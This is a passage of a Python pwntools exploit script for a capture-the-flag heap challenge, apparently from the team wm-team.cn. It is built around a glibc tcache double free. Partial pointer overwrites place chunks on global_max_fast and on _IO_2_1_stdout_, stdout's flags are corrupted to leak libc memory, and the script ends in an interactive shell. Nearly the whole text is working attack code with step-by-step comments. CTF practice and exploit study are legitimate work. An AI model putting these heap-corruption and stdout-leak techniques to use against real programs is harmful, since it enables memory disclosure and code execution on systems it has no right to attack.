    sh.sendlineafter("choice: ", option)

def add(idx, size):
    """Menu 1: allocate note ``idx`` with a buffer of ``size`` bytes."""
    choice(1)
    for prompt, value in (("Index: ", idx), ("Size: ", size)):
        sh.sendlineafter(prompt, str(value))

def edit(idx, content):
    """Menu 2: overwrite note ``idx`` with ``content`` (sent raw, no newline)."""
    choice(2)
    sh.sendlineafter("Index: ", str(idx))
    payload = str(content)
    sh.sendafter("Content: ", payload)

def delete(idx):
    """Menu 3: free note ``idx``."""
    choice(3)
    index = str(idx)
    sh.sendlineafter("Index: ", index)

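def pwn(sh, elf, libc):
    """Leak-less exploitation of ./leak: reuse one repeatedly freed note to
    (1) place a note on global_max_fast and (2) place another on
    _IO_2_1_stdout_, then make stdout flush libc memory to us. The approach
    follows VNCTF 2022 HideOnHeap (see the note above).

    The two-byte partial overwrites (b'\\x40\\xf9', b'\\x60\\xe7') encode the
    low 16 bits of the author's targets for this libc build; the high nibble
    of the second byte is randomised by ASLR, so a run succeeds only about
    1 time in 16 -- presumably why Attack() retries on EOF. Re-derive both
    values and the 0xb30 spacing for any other libc.

    Byte literals are used for the raw writes so the script runs on both
    Python 2 and 3.
    """
    context.log_level = "debug"
    # Three large notes spaced 0xb30 apart. They are freed only at the very
    # end, after global_max_fast has been made huge, so that glibc files
    # them as "fastbins" and writes their addresses far past main_arena.
    delta = 0xb30
    size = (delta * 2) + 0x20
    alloc_size = size - 0x10
    add(0, alloc_size)
    add(1, alloc_size + 0x10)
    add(2, alloc_size + 0x20)

    add(3, 0x80)
    add(4, 0x80)
    add(5, 0x80)
    # Free note 4 eight times. Zeroing its first 16 bytes (tcache next + key)
    # before each free defeats the key-based double-free check; seven frees
    # fill tcache[0x90] and the eighth sends the same chunk to the unsorted
    # bin, where its fd becomes a libc (main_arena) pointer.
    for i in range(8):
        edit(4, p64(0) * 2)
        delete(4)

    delete(3)
    # Partial overwrite of that fd's low 16 bits. The chunk is also still
    # in tcache, where the same field is the next pointer, so the allocation
    # after next is served at the patched address: global_max_fast (author's
    # annotation on note 7).
    edit(4, b'\x40\xf9')
    add(6, 0x80)
    add(7, 0x80)  # global_max_fast
    add(8, 0x110)  # clear unsortedbin

    # Three more double frees, then the same partial-overwrite trick to
    # point the next pointer at _IO_2_1_stdout_.
    for i in range(3):
        edit(4, p64(0) * 2)
        delete(4)
    edit(4, b'\x60\xe7')

    add(9, 0x80)
    add(10, 0x80)  # stdout
    # global_max_fast = 0xffffffffffffffff: every chunk size now counts as
    # "fast", so the three big frees below index way past main_arena.
    edit(7, b'\xff' * 8)

    delete(0)
    delete(1)
    delete(2)
    # Classic stdout leak: _flags = 0xfbad1800 (_IO_MAGIC | _IO_IS_APPENDING
    # | _IO_CURRENTLY_PUTTING), the three _IO_read_* pointers zeroed and the
    # low byte of _IO_write_base cleared, so the next flush writes out the
    # bytes between _IO_write_base and _IO_write_ptr.
    edit(10, p64(0xfbad1800) + b'\x00' * 0x19)
    # Menu choice 6 is whatever path flushes stdout on this binary.
    choice(6)
    # gdb.attach(sh, "b free")
    # delete(0)

    sh.interactive()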

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(elf=get_file(), libc=get_libc())
    sh.close()
    if flag != "":
        log.success('The flag is ' + re.search(r'flag{.+}', flag).group())

FROM : wm-team.cn
